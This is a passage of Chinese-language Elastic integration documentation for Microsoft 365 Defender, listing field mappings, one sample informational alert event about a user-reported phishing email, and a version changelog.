keyword

m365_defender.incident.alert.incident_web_url.full

keyword

m365_defender.incident.alert.incident_web_url.original

keyword

m365_defender.incident.alert.incident_web_url.password

keyword

m365_defender.incident.alert.incident_web_url.path

keyword

m365_defender.incident.alert.incident_web_url.port

long

m365_defender.incident.alert.incident_web_url.query

keyword

m365_defender.incident.alert.incident_web_url.scheme

keyword

m365_defender.incident.alert.incident_web_url.username

keyword

m365_defender.incident.alert.last_activity_datetime

与警报关联的最旧活动。

date

m365_defender.incident.alert.last_update_datetime

在 Microsoft 365 Defender 中上次更新警报的时间。

date

m365_defender.incident.alert.mitre_techniques

与 MITRE ATT&CK 框架对齐的攻击技术。

keyword

m365_defender.incident.alert.provider_alert_id

警报在生成警报的安全提供商产品中显示的 ID。

keyword

m365_defender.incident.alert.recommended_actions

如果生成此警报,应采取的建议响应和修正措施。

match_only_text

m365_defender.incident.alert.resolved_datetime

解决警报的时间。

date

m365_defender.incident.alert.service_source

创建此警报的服务或产品。可能的值包括:microsoftDefenderForEndpoint、microsoftDefenderForIdentity、microsoftCloudAppSecurity、microsoftDefenderForOffice365、microsoft365Defender、aadIdentityProtection、appGovernance、dataLossPrevention。

keyword

m365_defender.incident.alert.severity

指示对资产的可能影响。严重性越高,影响越大。通常,较高严重性的项目需要最紧急的关注。可能的值包括:unknown(未知)、informational(信息性)、low(低)、medium(中)、high(高)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.status

警报的状态。可能的值包括:new(新建)、inProgress(进行中)、resolved(已解决)、unknownFutureValue(未知未来值)。

keyword

m365_defender.incident.alert.tenant_id

创建警报的 Azure Active Directory 租户。

keyword

m365_defender.incident.alert.threat_display_name

与此警报关联的威胁。

keyword

m365_defender.incident.alert.threat_family_name

与此警报关联的威胁家族。

keyword

m365_defender.incident.alert.title

简短的标识字符串值,用于描述警报。

keyword

m365_defender.incident.assigned_to

事件的所有者,如果没有分配所有者,则为 null。可自由编辑的文本。

keyword

m365_defender.incident.classification

事件的规范。可能的值为:unknown、falsePositive、truePositive、informationalExpectedActivity、unknownFutureValue。

keyword

m365_defender.incident.comments

安全运营 (SecOps) 团队在管理事件时创建的注释数组。

flattened

m365_defender.incident.created_datetime

首次创建事件的时间。

date

m365_defender.incident.determination

指定事件的判断。可能的值为:unknown、apt、malware、securityPersonnel、securityTesting、unwantedSoftware、other、multiStagedAttack、compromisedUser、phishing、maliciousUserActivity、clean、insufficientData、confirmedUserActivity、lineOfBusinessApplication、unknownFutureValue。

keyword

m365_defender.incident.display_name

事件名称。

keyword

m365_defender.incident.id

表示事件的唯一标识符。

keyword

m365_defender.incident.last_update_datetime

事件上次更新的时间。

date

m365_defender.incident.odata_type

keyword

m365_defender.incident.redirect_incident_id

仅当事件与其他事件分组在一起时填充,作为处理事件的逻辑的一部分。在这种情况下,状态属性将被重定向。

keyword

m365_defender.incident.severity

指示对资产的可能影响。严重程度越高,影响越大。通常,严重程度较高的项目需要最立即的关注。可能的值为:unknown、informational、low、medium、high、unknownFutureValue。

keyword

m365_defender.incident.status

事件的状态。可能的值为:active、resolved、redirected、unknownFutureValue。

keyword

m365_defender.incident.tags

与事件关联的自定义标记数组。

keyword

m365_defender.incident.tenant_id

创建警报的 Azure Active Directory 租户。

keyword

m365_defender.incident.web_url.domain

keyword

m365_defender.incident.web_url.extension

keyword

m365_defender.incident.web_url.fragment

keyword

m365_defender.incident.web_url.full

keyword

m365_defender.incident.web_url.original

keyword

m365_defender.incident.web_url.password

keyword

m365_defender.incident.web_url.path

keyword

m365_defender.incident.web_url.port

long

m365_defender.incident.web_url.query

keyword

m365_defender.incident.web_url.scheme

keyword

m365_defender.incident.web_url.username

keyword

日志
编辑

这是 log 数据集。

示例

一个 log 的示例事件如下所示

{
    "@timestamp": "2020-09-06T12:07:55.32Z",
    "agent": {
        "ephemeral_id": "ec3d7681-6c8e-4b8c-a808-6f632687f2ad",
        "id": "a588bfad-b81a-4554-968a-cb8de7d78d90",
        "name": "elastic-agent-14529",
        "type": "filebeat",
        "version": "8.14.3"
    },
    "cloud": {
        "provider": "azure"
    },
    "data_stream": {
        "dataset": "m365_defender.log",
        "namespace": "94775",
        "type": "logs"
    },
    "ecs": {
        "version": "8.11.0"
    },
    "elastic_agent": {
        "id": "a588bfad-b81a-4554-968a-cb8de7d78d90",
        "snapshot": false,
        "version": "8.14.3"
    },
    "event": {
        "action": "InitialAccess",
        "agent_id_status": "verified",
        "category": [
            "host"
        ],
        "created": "2020-09-06T12:07:55.1366667Z",
        "dataset": "m365_defender.log",
        "duration": 0,
        "end": "2020-09-06T12:04:00Z",
        "id": "faf8edc936-85f8-a603-b800-08d8525cf099",
        "ingested": "2024-08-12T16:02:18Z",
        "kind": "alert",
        "original": "{\"alerts\":{\"actorName\":null,\"alertId\":\"faf8edc936-85f8-a603-b800-08d8525cf099\",\"assignedTo\":\"Automation\",\"category\":\"InitialAccess\",\"classification\":null,\"creationTime\":\"2020-09-06T12:07:54.3716642Z\",\"description\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2\",\"detectionSource\":\"OfficeATP\",\"determination\":null,\"devices\":[],\"entities\":{\"aadUserId\":null,\"accountName\":null,\"clusterBy\":null,\"deliveryAction\":null,\"deviceId\":null,\"domainName\":null,\"entityType\":\"MailBox\",\"fileName\":null,\"filePath\":null,\"ipAddress\":null,\"mailboxAddress\":\"[email protected]\",\"mailboxDisplayName\":\"test User3\",\"parentProcessCreationTime\":null,\"parentProcessId\":null,\"processCommandLine\":null,\"processCreationTime\":null,\"processId\":null,\"recipient\":null,\"registryHive\":null,\"registryKey\":null,\"registryValue\":null,\"registryValueType\":null,\"securityGroupId\":null,\"securityGroupName\":null,\"sender\":null,\"sha1\":null,\"sha256\":null,\"subject\":null,\"url\":null,\"userPrincipalName\":\"[email protected]\",\"userSid\":null},\"firstActivity\":\"2020-09-06T12:04:00Z\",\"incidentId\":924518,\"investigationId\":null,\"investigationState\":\"Queued\",\"lastActivity\":\"2020-09-06T12:04:00Z\",\"lastUpdatedTime\":\"2020-09-06T12:37:40.88Z\",\"mitreTechniques\":[],\"resolvedTime\":null,\"serviceSource\":\"OfficeATP\",\"severity\":\"Informational\",\"status\":\"InProgress\",\"threatFamilyName\":null,\"title\":\"Email reported by user as malware or phish\"},\"assignedTo\":null,\"classification\":\"Unknown\",\"comments\":[],\"createdTime\":\"2020-09-06T12:07:55.1366667Z\",\"determination\":\"NotAvailable\",\"incidentId\":924518,\"incidentName\":\"Email reported by user as malware or phish\",\"lastUpdateTime\":\"2020-09-06T12:07:55.32Z\",\"redirectIncidentId\":null,\"severity\":\"Informational\",\"status\":\"Active\",\"tags\":[]}",
        "provider": "OfficeATP",
        "severity": 1,
        "start": "2020-09-06T12:04:00Z",
        "timezone": "UTC",
        "type": [
            "info"
        ]
    },
    "file": {
        "hash": {}
    },
    "input": {
        "type": "httpjson"
    },
    "m365_defender": {
        "alerts": {
            "assignedTo": "Automation",
            "creationTime": "2020-09-06T12:07:54.3716642Z",
            "detectionSource": "OfficeATP",
            "entities": {
                "entityType": "MailBox",
                "mailboxAddress": "[email protected]",
                "mailboxDisplayName": "test User3"
            },
            "incidentId": "924518",
            "investigationState": "Queued",
            "lastUpdatedTime": "2020-09-06T12:37:40.88Z",
            "severity": "Informational",
            "status": "InProgress"
        },
        "classification": "Unknown",
        "determination": "NotAvailable",
        "incidentId": "924518",
        "incidentName": "Email reported by user as malware or phish",
        "status": "Active"
    },
    "message": "Email reported by user as malware or phish",
    "observer": {
        "name": "OfficeATP",
        "product": "365 Defender",
        "vendor": "Microsoft"
    },
    "process": {
        "parent": {}
    },
    "related": {
        "user": [
            "[email protected]"
        ]
    },
    "rule": {
        "description": "This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2"
    },
    "tags": [
        "preserve_original_event",
        "m365_defender",
        "forwarded"
    ],
    "threat": {
        "framework": "MITRE ATT&CK",
        "technique": {
            "name": [
                "InitialAccess"
            ]
        }
    },
    "user": {
        "name": "[email protected]"
    }
}
导出的字段
字段 描述 类型

@timestamp

事件时间戳。

date

cloud.image.id

云实例的镜像 ID。

keyword

data_stream.dataset

数据流数据集。

constant_keyword

data_stream.namespace

数据流命名空间。

constant_keyword

data_stream.type

数据流类型。

constant_keyword

event.dataset

事件数据集

constant_keyword

event.module

事件模块

constant_keyword

host.containerized

主机是否为容器。

布尔值

host.os.build

操作系统构建信息。

keyword

host.os.codename

操作系统代号(如果有)。

keyword

input.type

输入类型

keyword

log.offset

日志偏移

long

m365_defender.alerts.actorName

与此警报关联的活动组(如果有)。

keyword

m365_defender.alerts.assignedTo

事件的所有者,如果没有分配所有者,则为 null。

keyword

m365_defender.alerts.classification

事件的规范。属性值为:Unknown、FalsePositive、TruePositive 或 null。

keyword

m365_defender.alerts.creationTime

首次创建警报的时间。

date

m365_defender.alerts.detectionSource

最初检测到威胁的服务。

keyword

m365_defender.alerts.detectorId

检测器 ID。

keyword

m365_defender.alerts.determination

指定事件的判断。属性值为:NotAvailable、Apt、Malware、SecurityPersonnel、SecurityTesting、UnwantedSoftware、Other 或 null。

keyword

m365_defender.alerts.devices

与调查相关的设备。

flattened

m365_defender.alerts.entities.accountName

相关用户的帐户名称。

keyword

m365_defender.alerts.entities.clusterBy

如果 entityType 为 MailCluster,则为元数据列表。

keyword

m365_defender.alerts.entities.deliveryAction

相关电子邮件的传递状态。

keyword

m365_defender.alerts.entities.deviceId

与事件相关的设备的唯一 ID。

keyword

m365_defender.alerts.entities.entityType

已识别为属于给定警报或与给定警报相关的实体。属性值为:User、Ip、Url、File、Process、MailBox、MailMessage、MailCluster、Registry。

keyword

m365_defender.alerts.entities.evidenceCreationTime

证据创建时间。

date

m365_defender.alerts.entities.ipAddress

与事件相关的 IP 地址。

keyword

m365_defender.alerts.entities.mailboxAddress

相关邮箱的邮件地址。

keyword

m365_defender.alerts.entities.mailboxDisplayName

相关邮箱的显示名称。

keyword

m365_defender.alerts.entities.recipient

相关电子邮件的收件人。

keyword

m365_defender.alerts.entities.registryHive

如果 eventType 是注册表,则引用事件相关的注册表中的哪个配置单元。示例:HKEY_LOCAL_MACHINE。

keyword

m365_defender.alerts.entities.registryKey

引用事件相关的注册表项。

keyword

m365_defender.alerts.entities.registryValueType

与事件相关的注册表项/值对的值类型。

keyword

m365_defender.alerts.entities.remediationStatus

修复状态。

keyword

m365_defender.alerts.entities.securityGroupId

与电子邮件相关的用户的安全组 ID。

keyword

m365_defender.alerts.entities.securityGroupName

与电子邮件相关的用户的安全组名称。

keyword

m365_defender.alerts.entities.sender

相关电子邮件的发件人。

keyword

m365_defender.alerts.entities.subject

相关电子邮件的主题。

keyword

m365_defender.alerts.entities.userSid

事件用户 SID。

keyword

m365_defender.alerts.entities.verdict

事件裁定。

keyword

m365_defender.alerts.incidentId

表示此警报关联的事件的唯一标识符。

keyword

m365_defender.alerts.investigationId

此警报触发的自动调查 ID。

keyword

m365_defender.alerts.investigationState

有关调查当前状态的信息。

keyword

m365_defender.alerts.lastUpdatedTime

警报上次更新的时间。

date

m365_defender.alerts.mitreTechniques

与 MITRE ATT&CK™ 框架对齐的攻击技术。

keyword

m365_defender.alerts.providerAlertId

提供程序警报 ID。

keyword

m365_defender.alerts.resolvedTime

警报解决时间。

date

m365_defender.alerts.severity

相关警报的严重程度。

keyword

m365_defender.alerts.status

对警报进行分类(为“新建”、“活动”或“已解决”)。

keyword

m365_defender.alerts.threatFamilyName

与此警报关联的威胁家族。

keyword

m365_defender.alerts.userSid

相关用户的 SID。

keyword

m365_defender.assignedTo

警报的所有者。

keyword

m365_defender.classification

警报的规范。可能的值为:UnknownFalsePositiveTruePositive

keyword

m365_defender.comments

附加到相关事件的注释。

flattened

m365_defender.determination

指定事件的判断。属性值为:NotAvailable、Apt、Malware、SecurityPersonnel、SecurityTesting、UnwantedSoftware、Other。

keyword

m365_defender.incidentId

表示事件的唯一标识符。

keyword

m365_defender.incidentName

事件的名称。

keyword

m365_defender.incidentUri

事件 URI。

keyword

m365_defender.investigationState

调查的当前状态。

keyword

m365_defender.redirectIncidentId

仅当事件作为事件处理逻辑的一部分与其他事件分组在一起时填充。

keyword

m365_defender.status

指定警报的当前状态。可能的值为:UnknownNewInProgressResolved

keyword

m365_defender.tags

与事件关联的自定义标记数组,例如标记一组具有共同特征的事件。

keyword

变更日志

编辑
变更日志
版本 详细信息 Kibana 版本

2.17.0

增强 (查看拉取请求)
不要在主摄取管道中删除 event.original

8.13.0 或更高版本

2.16.0

增强 (查看拉取请求)
将“preserve_original_event”标签添加到 event.kind 设置为“pipeline_error”的文档中。

8.13.0 或更高版本

2.15.2

缺陷修复 (查看拉取请求)
修复 Painless 脚本中的字符串字面量。

8.13.0 或更高版本

2.15.1

增强 (查看拉取请求)
将不区分大小写的字段添加到进程事件中。

8.13.0 或更高版本

2.15.0

缺陷修复 (查看拉取请求)
修复 Windows 设备的操作系统分配。

增强 (查看拉取请求)
对于所有没有已知平台的 POSIX 系统,将 host.os.type 设置为 unix。

8.13.0 或更高版本

2.14.7

缺陷修复 (查看拉取请求)
修复 DNS 日志的管道错误。

8.13.0 或更高版本

2.14.6

缺陷修复 (查看拉取请求)
修复仪表盘过滤器,以查找正确的 event.severity 值。

8.13.0 或更高版本

2.14.5

缺陷修复 (查看拉取请求)
修复 DNS 答案字段的映射问题。

8.13.0 或更高版本

2.14.4

缺陷修复 (查看拉取请求)
修复 host.mac gsub 处理器,以处理已存在 - 的 MAC 地址。

8.13.0 或更高版本

2.14.3

缺陷修复 (查看拉取请求)
修复 sslconnectioninspected 事件的 network.protocol 设置为 dns

8.13.0 或更高版本

2.14.2

缺陷修复 (查看拉取请求)
修复 network.transportnetwork.protocol 处理。

8.13.0 或更高版本

2.14.1

缺陷修复 (查看拉取请求)
修复包含重复进程名称的进程可执行文件。

8.13.0 或更高版本

2.14.0

增强 (查看拉取请求)
改进 ECS 映射

8.13.0 或更高版本

2.13.0

增强 (查看拉取请求)
删除了 import_mappings。将 kibana 约束更新为 ^8.13.0。修改了字段定义,以删除 ecs@mappings 组件模板中多余的 ECS 字段。

8.13.0 或更高版本

2.12.0

增强 (查看拉取请求)
使 host.iphost.mac 字段符合 ECS 字段定义。

8.12.0 或更高版本

2.11.0

增强 (查看拉取请求)
改进检测规则支持

8.12.0 或更高版本

2.10.0

增强 (查看拉取请求)
改进对空响应的处理。

8.12.0 或更高版本

2.9.1

缺陷修复 (查看拉取请求)
删除 alerts 数据流中的最后一页事件。

8.12.0 或更高版本

2.9.0

增强 (查看拉取请求)
改进命令行分析器。

8.12.0 或更高版本

2.8.1

缺陷修复 (查看拉取请求)
解决了字段的 ignore_malformed 问题。

8.12.0 或更高版本

2.8.0

增强 (查看拉取请求)
将敏感值设置为 secret 并修复不正确的映射。

8.12.0 或更高版本

2.7.1

缺陷修复 (查看拉取请求)
处理无效的 IP 地址。

8.7.1 或更高版本

2.7.0

增强 (查看拉取请求)
添加警报数据流的支持。

8.7.1 或更高版本

2.6.2

缺陷修复 (查看拉取请求)
修复日志数据流的游标值和查询构建。

8.7.1 或更高版本

2.6.1

增强 (查看拉取请求)
更改了所有者

8.7.1 或更高版本

2.6.0

增强 (查看拉取请求)
将 geoip 处理添加到源和目标 IP 字段。

8.7.1 或更高版本

2.5.1

缺陷修复 (查看拉取请求)
修复 process.command_lineprocess.parent.command_line 覆盖的问题。

8.7.1 或更高版本

2.5.0

增强 (查看拉取请求)
将请求跟踪器日志计数限制为五个。

8.7.1 或更高版本

2.4.0

增强 (查看拉取请求)
ECS 版本更新为 8.11.0。

8.7.1 或更高版本

2.3.1

缺陷修复 (查看拉取请求)
删除将原始 message 字段重命名为 event.original 的操作

8.7.1 或更高版本

2.3.0

增强 (查看拉取请求)
ECS 版本更新为 8.10.0。

8.7.1 或更高版本

2.2.0

增强 (查看拉取请求)
包清单中的 format_version 从 2.11.0 更改为 3.0.0。从包清单中删除了点状 YAML 键。在包清单中添加了 owner.type: elastic

8.7.1 或更高版本

2.1.0

增强 (查看拉取请求)
添加 tags.yml 文件,以便集成的仪表盘和保存的搜索都带有“Security Solution”标签,并在 Security Solution UI 中显示。

8.7.1 或更高版本

2.0.1

缺陷修复 (查看拉取请求)
修复模板代码片段转义并为管道错误添加 event.kind。

8.7.1 或更高版本

2.0.0

增强 (查看拉取请求)
在 ECS 字段覆盖率和附加字段映射方面进行了重大改进。

8.7.1 或更高版本

1.17.1

缺陷修复 (查看拉取请求)
修复 log 数据流上的指纹处理器,以避免文档冲突

8.7.1 或更高版本

1.17.0

增强 (查看拉取请求)
添加对较新 Oauth 令牌端点的支持,并修复一些 ECS 映射。

8.7.1 或更高版本

1.16.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.9.0。

8.7.1 或更高版本

1.15.0

增强 (查看拉取请求)
记录持续时间单位。

8.7.1 或更高版本

1.14.0

增强 (查看拉取请求)
将 package-spec 更新到 2.9.0。

8.7.1 或更高版本

1.13.0

增强 (查看拉取请求)
将仪表盘转换为 Lens。

8.7.1 或更高版本

1.12.0

增强 (查看拉取请求)
记录有效的持续时间单位。

8.7.1 或更高版本

1.11.2

缺陷修复 (查看拉取请求)
将 user.name 字段的映射添加到事件数据流中。

8.7.1 或更高版本

1.11.1

缺陷修复 (查看拉取请求)
修复 event.query 类型以分组

8.7.1 或更高版本

1.11.0

增强 (查看拉取请求)
确保为管道错误正确设置 event.kind。

8.7.1 或更高版本

1.10.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.8.0。

8.7.1 或更高版本

1.9.0

增强 (查看拉取请求)
添加并将 host.name 字段转换为小写

8.7.1 或更高版本

1.8.0

增强 (查看拉取请求)
添加一个新标志以启用请求跟踪

8.7.1 或更高版本

1.7.1

缺陷修复 (查看拉取请求)
将事件数据流的 event.kind 更新为 alert,并处理事件数据流中 AttackTechniques 字段的 null 值。

7.16.0 或更高版本
8.0.0 或更高版本

1.7.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.7.0。

7.16.0 或更高版本
8.0.0 或更高版本

1.6.2

增强 (查看拉取请求)
添加了类别和/或子类别。

7.16.0 或更高版本
8.0.0 或更高版本

1.6.1

增强 (查看拉取请求)
更新数据流标题和 ReadMe。

7.16.0 或更高版本
8.0.0 或更高版本

1.6.0

增强 (查看拉取请求)
添加新的事件数据流。

7.16.0 或更高版本
8.0.0 或更高版本

1.5.1

Bug 修复 (查看拉取请求)
在日志数据流中删除空的事件集。

7.16.0 或更高版本
8.0.0 或更高版本

1.5.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.6.0。

7.16.0 或更高版本
8.0.0 或更高版本

1.4.3

增强 (查看拉取请求)
更新事件数据流的 API 版本。

增强 (查看拉取请求)
将日志数据流标记为已弃用,因为它使用的是较旧的 Defender API。

7.16.0 或更高版本
8.0.0 或更高版本

1.4.2

Bug 修复 (查看拉取请求)
修复实体字段为空时的错误。

7.16.0 或更高版本
8.0.0 或更高版本

1.4.1

Bug 修复 (查看拉取请求)
删除重复字段。

7.16.0 或更高版本
8.0.0 或更高版本

1.4.0

增强 (查看拉取请求)
添加新的事件数据流。

7.16.0 或更高版本
8.0.0 或更高版本

1.3.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.5.0。

7.16.0 或更高版本
8.0.0 或更高版本

1.2.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.4.0

7.16.0 或更高版本
8.0.0 或更高版本

1.1.2

Bug 修复 (查看拉取请求)
修复代理 URL 文档渲染。

7.16.0 或更高版本
8.0.0 或更高版本

1.1.1

增强 (查看拉取请求)
更新软件包名称和描述,使其与标准措辞保持一致

7.16.0 或更高版本
8.0.0 或更高版本

1.1.0

增强 (查看拉取请求)
将软件包更新到 ECS 8.3.0。

7.16.0 或更高版本
8.0.0 或更高版本

1.0.4

Bug 修复 (查看拉取请求)
更新重复处理,以支持重定向类型的警报

7.16.0 或更高版本
8.0.0 或更高版本

1.0.3

Bug 修复 (查看拉取请求)
在提取管道中添加重复处理

7.16.0 或更高版本
8.0.0 或更高版本

1.0.2

Bug 修复 (查看拉取请求)
修复 comments 字段的映射并添加缺失字段

1.0.1

增强 (查看拉取请求)
添加多字段的文档

7.16.0 或更高版本
8.0.0 或更高版本

1.0.0

增强 (查看拉取请求)
第一个版本